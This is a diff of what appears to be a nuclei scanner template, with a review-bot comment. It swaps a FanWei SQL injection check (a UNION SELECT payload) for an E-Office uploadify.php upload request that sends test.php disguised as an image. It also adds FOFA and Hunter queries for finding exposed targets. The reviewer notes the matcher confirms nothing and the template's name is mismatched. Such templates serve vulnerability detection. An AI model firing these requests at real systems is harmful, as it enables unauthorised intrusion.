@@ -1,29 +1,39 @@ id: FanWei - info: - name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability + name: FanWei Micro OA E-Office Uploadify Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information- + The pan micro OA E-Office uploads files in uploadify.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability metadata: - fofa-query: app="泛微-协同办公OA" - hunter-query: web.title="泛微-协同办公OA" - + fofa-query: app="泛微-EOffice" + hunter-query: web.title="泛微软件" http: - raw: - | - GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1 + POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) - Accept-Encoding: gzip, deflate + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 Connection: close + Content-Length: 259 + Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 + Accept-Encoding: gzip + + --e64bdf16c554bbc109cecef6451c26a4 + Content-Disposition: form-data; name="Filedata"; filename="test.php" + Content-Type: image/jpeg + + + + --e64bdf16c554bbc109cecef6451c26a4-- req-condition: true matchers: - type: dsl dsl: - - 'contains(body_1, "c4ca")' + - 'status_code_1 == 200 && len(body) > 0' condition: and + +# /attachment/3466744850/xxx.php
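Review bot: This hunk is byte-for-byte the change made to `poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml` earlier in the commit, so the same problems apply: the matcher `status_code_1 == 200 && len(body) > 0` confirms nothing about the upload, and the filename and `id: FanWei` no longer describe the E-Office `uploadify.php` request. Keeping two identical copies under `poc/sql/` and `poc/sql_injection/` doubles every finding and every future fix; keep one, and if the directory layout needs both, reference the other rather than duplicating it.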